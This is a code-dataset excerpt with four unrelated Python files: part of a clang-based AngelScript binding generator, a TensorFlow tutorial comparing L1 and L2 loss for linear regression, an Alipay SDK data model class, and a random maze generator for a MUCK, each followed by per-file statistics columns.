t = cindex.Type(cindex.TypeKind.VOID.from_param())
f.behaviour = "asBEHAVE_ADDREF"
f.return_type = Type(t)
behaviours.append(f)
f = copy.deepcopy(f)
f.name = "DelRef"
f.behaviour = "asBEHAVE_RELEASE"
behaviours.append(f)
return ret
class ObjectField:
def __init__(self, clazz, name, type):
self.clazz = clazz
self.name = name
self.type = type
pn = self.pretty_name()
if mfer and mfer.search(pn):
raise Exception("Matches exclude pattern")
if mfir and not mfir.search(pn):
raise Exception("Doesn't match include pattern")
def uses(self, typename):
return self.type.resolved == typename
def pretty_name(self):
return "%s %s::%s" % (self.type, self.clazz, self.name)
def get_register_string(self):
return _assert("engine->RegisterObjectProperty(\"%s\", \"%s %s\", asOFFSET(%s,%s))" % (self.clazz, self.type, self.name, self.clazz, self.name))
typedefs = []
enums = []
objecttypes = {}
functions = []
objectmethods = []
objectfields = []
includes = []
behaviours = []
def _assert(line):
if doassert:
return "RegisterVerifyAPI(%s);" % line
else:
return "%s;" % line
def get_typedef(cursor):
#tokens = cindex.tokenize(tu, cursor.extent)
tokens = list(cindex.TokenGroup.get_tokens(tu, cursor.extent))
good = True
if len(tokens) >= 4:
for x in tokens[1:-2]:
if x.kind != cindex.TokenKind.IDENTIFIER and x.kind != cindex.TokenKind.KEYWORD:
good = False
break
else:
good = False
if good:
kind = " ".join([t.spelling for t in tokens[1:len(tokens)-2]])
name = tokens[len(tokens)-2].spelling
else:
data = ""
for token in tokens:
data += token.spelling + " "
return None, data
return name, kind
def add_include(filename):
if not filename in includes and filename.endswith(".h"):
includes.append(filename)
def walk(cursor):
global typedefs
global enums
global objecttypes
global functions
global objectmethods
for child in cursor.get_children():
if not child.location.file:
continue
filename = child.location.file.name
if child.kind == cindex.CursorKind.TYPEDEF_DECL:
name, kind = get_typedef(child)
if name:
typedef[name] = kind
if fer and fer.search(filename):
continue
if fir and not fir.search(filename):
continue
if child.kind == cindex.CursorKind.MACRO_DEFINITION:
tokens = list(cindex.TokenGroup.get_tokens(tu, child.extent))
if tokens[0].kind == cindex.TokenKind.IDENTIFIER and tokens[1].kind == cindex.TokenKind.LITERAL and is_int(tokens[1].spelling):
define = _assert("engine->RegisterEnumValue(\"HASH_DEFINES\", \"%s\", %s)" % (tokens[0].spelling, tokens[1].spelling))
if define not in enums:
enums.append(define)
elif child.kind == cindex.CursorKind.FUNCTION_DECL:
try:
f = Function(child)
if "operator" in f.name:
raise Exception("Non member operator functions not supported currently")
else:
functions.append(f)
add_include(filename)
except Exception as e:
logWarning("Skipping function %s - %s" % (child.spelling, e))
elif child.kind == cindex.CursorKind.TYPEDEF_DECL:
name, kind = get_typedef(child)
if name:
typedef[name] = kind
if get_real_type(kind) not in as_builtins:
logWarning("Typedef %s = %s can't be registered as it doesn't resolve to an AngelScript builtin type" % (name, kind))
else:
typedefs.append(_assert("engine->RegisterTypedef(\"%s\", \"%s\")" % (name, get_real_type(kind))))
else:
logWarning("Typedef too complex, skipping: %s" % name)
elif child.kind == cindex.CursorKind.CLASS_DECL or child.kind == cindex.CursorKind.STRUCT_DECL:
children = list(child.get_children())
if len(children) == 0:
continue
if oer and oer.search(child.spelling):
continue
if oir and not oir.search(child.spelling):
continue
classname = child.spelling
if len(classname) == 0:
classname = child.displayname
if len(classname) == 0:
logWarning("Skipping class or struct defined at %s" % cursor.extent)
continue
if classname in objecttypes:
# TODO: different namespaces
logWarning("Skipping type %s, as it is already defined" % classname)
o = ObjectType(child, children, classname)
objecttypes[classname] = o
add_include(filename)
elif child.kind == cindex.CursorKind.MACRO_INSTANTIATION or \
child.kind == cindex.CursorKind.CONVERSION_FUNCTION or \
child.kind == cindex.CursorKind.INCLUSION_DIRECTIVE or \
child.kind == cindex.CursorKind.UNEXPOSED_DECL:
continue
# TODO: Make sure this is what we want
elif child.kind == cindex.CursorKind.CONSTRUCTOR or \
child.kind == cindex.CursorKind.CXX_METHOD:
continue
else:
logWarning("Unhandled cursor: %s, %s" % (child.displayname, child.kind))
# Removes usage of object types that are used both as a reference and a value type
def mismatch_filter(source, toremove):
toadd =source
ret = []
while len(toadd):
curr = toadd.pop(0)
if curr.uses(toremove):
logWarning("\t%s" % curr.pretty_name())
else:
ret.append(curr)
return ret
def remove_ref_val_mismatches():
global functions
global objectmethods
global behaviours
for key in objecttype_scoreboard:
isref = is_reference_type(key)
ref, val = objecttype_scoreboard[key]
if (isref and val == 0) or (not isref and ref == 0):
continue
logWarning("\"%s\" is used both as a reference type (%d) and a value type (%d). The following will be removed:" % (key, ref, val))
toremove = "%s%s" % (key, "*" if not isref else "")
functions = mismatch_filter(functions, toremove)
objectmethods = mismatch_filter(objectmethods, toremove)
behaviours = mismatch_filter(behaviours, toremove)
def unknown_filter(source):
toadd = source
ret = []
while len(toadd):
keep = True
curr = toadd.pop(0)
broken = None
for t in curr.args:
if not t.is_known():
broken = t.resolved
keep = False
if not curr.return_type.is_known():
broken = curr.return_type.resolved
keep = False
if not keep:
logWarning("Removing %s as it's using an unknown type %s [disable with -ku]" % (curr.pretty_name(), broken))
else:
ret.append(curr)
return ret
def remove_unknowns():
global functions
global objectmethods
global behaviours
functions = unknown_filter(functions)
objectmethods = unknown_filter(objectmethods)
behaviours = unknown_filter(behaviours)
def dup_filter(source):
toadd = source
ret = []
names = []
while len(toadd):
keep = True
curr = toadd.pop(0)
pn = curr.pretty_name()
if pn in names:
logWarning("Removing duplicate function %s" % pn)
else:
ret.append(curr)
names.append(pn)
return ret
def remove_duplicates():
global functions
global objectmethods
global behaviours
functions = dup_filter(functions)
objectmethods = dup_filter(objectmethods)
behaviours = dup_filter(behaviours)
def remove_reference_destructors():
global behaviours
toadd = behaviours
behaviours = []
while len(toadd):
curr = toadd.pop(0)
if is_reference_type(curr.clazz) and curr.behaviour == "asBEHAVE_DESTRUCT":
logWarning("Removing destructor for reference type %s" % curr.clazz)
else:
behaviours.append(curr)
def remove_pure_virtual_constructors():
global behaviours
toadd = behaviours
behaviours = []
while len(toadd):
curr = toadd.pop(0)
virt = False
if curr.clazz in objecttypes:
virt = objecttypes[curr.clazz].has_pure_virtuals
if virt and (curr.behaviour == "asBEHAVE_CONSTRUCT" or curr.behaviour == "asBEHAVE_FACTORY"):
logWarning("Removing constructor for type %s which has pure virtual members" % curr.clazz)
else:
behaviours.append(curr)
walk(tu.cursor)
# File processed, do some post processing
remove_ref_val_mismatches()
if not keep_unknowns:
remove_unknowns()
remove_duplicates()
remove_reference_destructors()
remove_pure_virtual_constructors()
if output_filename != None:
output_filename = output_filename.replace("${this_file_path}", os.path.dirname(os.path.abspath(configfile)))
ot = [objecttypes[o] for o in objecttypes]
ot.sort(cmp=lambda a, b: cmp(a.index, b.index))
for diag in tu.diagnostics:
logWarning("clang had the following to say: %s" % (diag.spelling))
objectTypeStrings = []
for o in ot:
objectTypeStrings.append(o.get_register_string())
typeDefStrings = []
for o in typedefs:
typeDefStrings.append(o.get_register_string())
functionStrings = []
for o in functions:
functionStrings.append(o.get_register_string())
behaviourStrings = []
for o in behaviours:
behaviourStrings.append(o.get_register_string())
objectMethodStrings = []
for o in objectmethods:
objectMethodStrings.append(o.get_register_string())
objectFieldStrings = []
for o in objectfields:
objectFieldStrings.append(o.get_register_string())
tpl = Template(filename='ScriptBind.mako')
rendered = tpl.render(
genericWrappers=generic_wrappers,
funcName=funcname,
includes=includes,
objectTypes=objectTypeStrings,
typeDefs=typeDefStrings,
hashDefines=_assert("engine->RegisterEnum(\"HASH_DEFINES\")"),
enums="",
functions=functionStrings,
behaviours=behaviourStrings,
objectMethods=objectMethodStrings,
objectFields=objectFieldStrings)
with open(output_filename, "w") as f:
f.write(rendered)
sys.stderr.write("Finished with %d warnings\n" % warn_count)
| 35.252592
| 221
| 0.558859
| 4,186
| 37,403
| 4.889871
| 0.124462
| 0.005863
| 0.027358
| 0.02687
| 0.327031
| 0.242904
| 0.187796
| 0.142704
| 0.108066
| 0.091602
| 0
| 0.003697
| 0.320188
| 37,403
| 1,060
| 222
| 35.285849
| 0.801314
| 0.019838
| 0
| 0.307606
| 0
| 0.002237
| 0.132897
| 0.027316
| 0.001119
| 0
| 0
| 0.000943
| 0.01566
| 1
| 0.045861
| false
| 0.003356
| 0.00783
| 0.005593
| 0.111857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75ca90abf615365ec5eda2bc92c9c7ddc159748c
| 3,699
|
py
|
Python
|
cookbook/3 Linear Regression/lin_reg_l1_l2_loss.py
|
keetsky/tensorflow_learn
|
77205434c2e3d70d482a756f5f679622d10f49b2
|
[
"Apache-2.0"
] | null | null | null |
cookbook/3 Linear Regression/lin_reg_l1_l2_loss.py
|
keetsky/tensorflow_learn
|
77205434c2e3d70d482a756f5f679622d10f49b2
|
[
"Apache-2.0"
] | null | null | null |
cookbook/3 Linear Regression/lin_reg_l1_l2_loss.py
|
keetsky/tensorflow_learn
|
77205434c2e3d70d482a756f5f679622d10f49b2
|
[
"Apache-2.0"
] | null | null | null |
'''
# Linear Regression: understanding loss function in linear regression
#----------------------------------
#
# This function shows how to use Tensorflow to
# solve linear regression.
# y = Ax + b
#
# We will use the iris data, specifically:
# y = Sepal Length
# x = Petal Width
'''
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from sklearn import datasets
from tensorflow.python.framework import ops
#%%
#L2 Loss
ops.reset_default_graph()
sess=tf.Session()
# Load the data
# iris.data = [(Sepal Length, Sepal Width, Petal Length, Petal Width)]
iris=datasets.load_iris()
x_vals=np.array([x[3] for x in iris.data])
y_vals=np.array([y[0] for y in iris.data])
# Declare batch size
batch_size = 25
# Initialize placeholders
x_data=tf.placeholder(shape=[None,1],dtype=tf.float32)
y_=tf.placeholder(shape=[None,1], dtype=tf.float32)
#create variable for linear regression
A=tf.Variable(tf.random_normal(shape=[1,1]))
b=tf.Variable(tf.random_normal(shape=[1,1]))
#declare model operations
y=tf.add(tf.matmul(x_data,A),b)
#declare loss functions (1/2/m) (y_-y)^2
loss=tf.reduce_mean(tf.square(y_- y))
#Declare optimizer
op=tf.train.GradientDescentOptimizer(0.4)
train_step=op.minimize(loss)
#initialize variables
init=tf.global_variables_initializer()
sess.run(init)
#training loop
loss_vec_l2=[]
for i in range(100):
rand_index=np.random.choice(len(x_vals),size=batch_size)#随机从len(x_vals)中选取25个下标
rand_x=np.transpose([x_vals[rand_index]])
rand_y=np.transpose([y_vals[rand_index]])
sess.run(train_step,feed_dict={x_data:rand_x,y_:rand_y})
temp_loss=sess.run(loss,feed_dict={x_data:rand_x,y_:rand_y})
loss_vec_l2.append(temp_loss)
if (i+1)%25==0:
print('Step #' + str(i+1) + ' A = ' + str(sess.run(A)) + ' b = ' + str(sess.run(b)))
print('Loss = ' + str(temp_loss))
#%%
#L1 Loss
ops.reset_default_graph()
# Create graph
sess = tf.Session()
# Load the data
# iris.data = [(Sepal Length, Sepal Width, Petal Length, Petal Width)]
iris = datasets.load_iris()
x_vals = np.array([x[3] for x in iris.data])
y_vals = np.array([y[0] for y in iris.data])
# Declare batch size and number of iterations
batch_size = 25
learning_rate = 0.4 # Will not converge with learning rate at 0.4
iterations = 100
# Initialize placeholders
x_data = tf.placeholder(shape=[None, 1], dtype=tf.float32)
y_target = tf.placeholder(shape=[None, 1], dtype=tf.float32)
# Create variables for linear regression
A = tf.Variable(tf.random_normal(shape=[1,1]))
b = tf.Variable(tf.random_normal(shape=[1,1]))
# Declare model operations
model_output = tf.add(tf.matmul(x_data, A), b)
# Declare loss functions
loss_l1 = tf.reduce_mean(tf.abs(y_target - model_output))
# Initialize variables
init = tf.initialize_all_variables()
sess.run(init)
# Declare optimizers
my_opt_l1 = tf.train.GradientDescentOptimizer(learning_rate)
train_step_l1 = my_opt_l1.minimize(loss_l1)
# Training loop
loss_vec_l1 = []
for i in range(iterations):
rand_index = np.random.choice(len(x_vals), size=batch_size)
rand_x = np.transpose([x_vals[rand_index]])
rand_y = np.transpose([y_vals[rand_index]])
sess.run(train_step_l1, feed_dict={x_data: rand_x, y_target: rand_y})
temp_loss_l1 = sess.run(loss_l1, feed_dict={x_data: rand_x, y_target: rand_y})
loss_vec_l1.append(temp_loss_l1)
if (i+1)%25==0:
print('Step #' + str(i+1) + ' A = ' + str(sess.run(A)) + ' b = ' + str(sess.run(b)))
#%%
#plot loss over time(steps)
plt.plot(loss_vec_l1, 'k-', label='L1 Loss')
plt.plot(loss_vec_l2, 'r--', label='L2 Loss')
plt.title('L1 and L2 Loss per Generation')
plt.xlabel('Generation')
plt.ylabel('L1 Loss')
plt.legend(loc='upper right')
plt.show()
| 30.073171
| 92
| 0.711544
| 624
| 3,699
| 4.048077
| 0.235577
| 0.027712
| 0.017419
| 0.034838
| 0.527712
| 0.510689
| 0.510689
| 0.510689
| 0.510689
| 0.457641
| 0
| 0.023958
| 0.131117
| 3,699
| 122
| 93
| 30.319672
| 0.761979
| 0.263585
| 0
| 0.447761
| 0
| 0
| 0.042799
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.074627
| 0
| 0.074627
| 0.044776
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75cdec8d921818ac60703e7cb57923284eb229e2
| 2,499
|
py
|
Python
|
alipay/aop/api/domain/AlipayCommerceEducateTuitioncodeMonitorCreateModel.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | null | null | null |
alipay/aop/api/domain/AlipayCommerceEducateTuitioncodeMonitorCreateModel.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | null | null | null |
alipay/aop/api/domain/AlipayCommerceEducateTuitioncodeMonitorCreateModel.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayCommerceEducateTuitioncodeMonitorCreateModel(object):
def __init__(self):
self._bank_type = None
self._login_account = None
self._out_apply_id = None
self._parent_no = None
@property
def bank_type(self):
return self._bank_type
@bank_type.setter
def bank_type(self, value):
self._bank_type = value
@property
def login_account(self):
return self._login_account
@login_account.setter
def login_account(self, value):
self._login_account = value
@property
def out_apply_id(self):
return self._out_apply_id
@out_apply_id.setter
def out_apply_id(self, value):
self._out_apply_id = value
@property
def parent_no(self):
return self._parent_no
@parent_no.setter
def parent_no(self, value):
self._parent_no = value
def to_alipay_dict(self):
params = dict()
if self.bank_type:
if hasattr(self.bank_type, 'to_alipay_dict'):
params['bank_type'] = self.bank_type.to_alipay_dict()
else:
params['bank_type'] = self.bank_type
if self.login_account:
if hasattr(self.login_account, 'to_alipay_dict'):
params['login_account'] = self.login_account.to_alipay_dict()
else:
params['login_account'] = self.login_account
if self.out_apply_id:
if hasattr(self.out_apply_id, 'to_alipay_dict'):
params['out_apply_id'] = self.out_apply_id.to_alipay_dict()
else:
params['out_apply_id'] = self.out_apply_id
if self.parent_no:
if hasattr(self.parent_no, 'to_alipay_dict'):
params['parent_no'] = self.parent_no.to_alipay_dict()
else:
params['parent_no'] = self.parent_no
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayCommerceEducateTuitioncodeMonitorCreateModel()
if 'bank_type' in d:
o.bank_type = d['bank_type']
if 'login_account' in d:
o.login_account = d['login_account']
if 'out_apply_id' in d:
o.out_apply_id = d['out_apply_id']
if 'parent_no' in d:
o.parent_no = d['parent_no']
return o
| 29.05814
| 77
| 0.605442
| 317
| 2,499
| 4.422713
| 0.14511
| 0.085592
| 0.10699
| 0.0699
| 0.32097
| 0.272468
| 0.0699
| 0.042796
| 0
| 0
| 0
| 0.000572
| 0.30052
| 2,499
| 85
| 78
| 29.4
| 0.801487
| 0.016807
| 0
| 0.115942
| 0
| 0
| 0.092947
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15942
| false
| 0
| 0.028986
| 0.057971
| 0.304348
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75d4809609a0cd8b60448ab7ac5fccbe7bba640b
| 5,010
|
py
|
Python
|
maze.py
|
vcxsd/muck-builder
|
12c1defbb816395a119da1992c1352d614d5507b
|
[
"MIT"
] | null | null | null |
maze.py
|
vcxsd/muck-builder
|
12c1defbb816395a119da1992c1352d614d5507b
|
[
"MIT"
] | null | null | null |
maze.py
|
vcxsd/muck-builder
|
12c1defbb816395a119da1992c1352d614d5507b
|
[
"MIT"
] | null | null | null |
import random
import yaml
class Grammar:
""" A simpler version of Tracery's ideas. """
def __init__( self, rules = None ):
self.rules = rules or { }
# To be pop()'d off by the caller.
self.saved = [ ]
def parse( self, string ):
if "[" in string or "]" in string:
fragments = [ ]
buffer = ''
brackets = False
for char in string:
if char == '[':
fragments += [ buffer ]
buffer = ''
if brackets:
raise Exception( "Grammar.parse: can't nest brackets" )
brackets = True
elif char == ']':
if not brackets:
raise Exception( "Grammar.parse: unmatched bracket" )
brackets = False
# Mechanism for saving what result we got: put a ! somewhere in the [ ]-surrounded text.
if buffer.replace( "!", "" ) in self.rules:
fragments += [ self.parse( random.choice( self.rules[buffer.replace( "!", "" )] ) ) ]
if "!" in buffer:
self.saved += [ fragments[-1] ]
buffer = ''
else:
raise Exception( "Grammar.parse: no such rule '" + buffer + "'." )
else:
buffer += char
if buffer != '':
fragments += [ buffer ]
return "".join( fragments )
else:
return string
def rule( self, rule, new = None ):
if new:
self.rules[rule] = new
else:
if rule in self.rules:
return self.rules[rule]
else:
return None
wallMaker = Grammar({
'wallMat': [ 'stone', 'rock', 'wood', 'paper', 'earth', 'crystal', 'leafy vagueness', 'sand', 'skin', 'bark', 'foliage', 'needles', 'delicate tiles', 'agate', 'quartz', 'glass', 'iron', 'copper' ],
'wallCond': [ 'dark', 'heavy', 'slick', 'moss-clung', 'twisted', 'fluted', 'greenish', 'dark', 'hot', 'lumpy', 'unsteady', 'slippery', 'geometrically flanged', 'sigil-eaten', 'consuming', 'blue', 'reddish', 'translucent', 'ultramarine', 'sky-blue', 'delicate pink', 'fuligin' ],
'walls': [ 'walls of [wallMat] close in; the way is [width].',
'[wallCond] walls of [wallMat] close in.',
'the walls are [wallCond] [wallMat]... the tunnels, [width].',
'all around, [wallCond] [wallMat].',
'all around, [wallMat].',
'there\'s [wallMat] everywhere here.',
'there\'s [wallMat] everywhere here. it\'s [wallCond].',
'[wallCond] [wallMat] all around.',
'the walls are made of [wallMat] here.',
'this place is built entirely of [wallMat].',
'it\'s very [wallCond] here.',
'[width], [wallCond].',
'[wallMat].',
'[wallCond].'],
'width': [ 'suffocatingly close', 'echoing', 'massive', 'wide', 'barely large enough to pass crawling', 'thin and straight', 'tall and narrow', 'tiny', 'spacious', 'vast' ],
'door': [ 'door', 'hatch', 'gate', 'opening', 'incision', 'grating', 'well', 'oubliette', 'tunnel', 'arch' ],
'doorMat': [ 'rock', 'oaken', 'papery', 'crystal', 'glass', 'iron', 'silver' ],
'hidden': [ 'half-hidden', 'in plain view', 'almost impossible to spot', 'staring you in the face', 'which can only be found by touch' ]
})
if __name__ == '__main__':
linkNames = [ "[N]orth;north;n", "[S]outh;south;s", "[E]ast;east;e", "[W]est;west;w", "[U]p;up;u" ]
project = { "projectName": "maze", "rooms": { } }
roomCount = 25
for i in range(0, roomCount):
desc = wallMaker.parse("[walls]\n\na [doorMat] [!door], [hidden].")
door = wallMaker.saved.pop( )
ID = "room-" + i.__str__()
project["rooms"][ ID ] = { "NAME": "Maze" }
project["rooms"][ ID ][ "LINKS" ] = { }
project["rooms"][ ID ][ "_/de" ] = desc
project["rooms"][ ID ][ "POSTSCRIPT" ] = { "BUILD": [ "@set here=D", "@tel here=#63" ] }
# Each room shall have 2-3 links to other random rooms. Don't try to be consistent.
ln = linkNames.copy( )
random.shuffle(ln)
for i in range( 0, random.choice([ 2, 3, 3, 3, 3, 4, 4, 4 ]) ):
project["rooms"][ ID ][ "LINKS" ][ "room-" + random.choice( range(0, roomCount) ).__str__() ] = {
"NAME": ln.pop( ),
"succ": "You force your way through the " + door + ".",
"osucc": "forces their way through the " + door + ".",
"odrop": "emerges through an obscure way from some other part of the maze." }
with open("maze.gen.yaml", "w") as fh:
fh.write( yaml.dump( project ) )
print( "write: maze.gen.yaml (probably.)" )
| 35.531915
| 282
| 0.48982
| 525
| 5,010
| 4.634286
| 0.48
| 0.025894
| 0.028771
| 0.032059
| 0.079737
| 0.019729
| 0
| 0
| 0
| 0
| 0
| 0.005464
| 0.342515
| 5,010
| 140
| 283
| 35.785714
| 0.733151
| 0.048104
| 0
| 0.134831
| 0
| 0
| 0.326329
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033708
| false
| 0.011236
| 0.022472
| 0
| 0.11236
| 0.011236
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|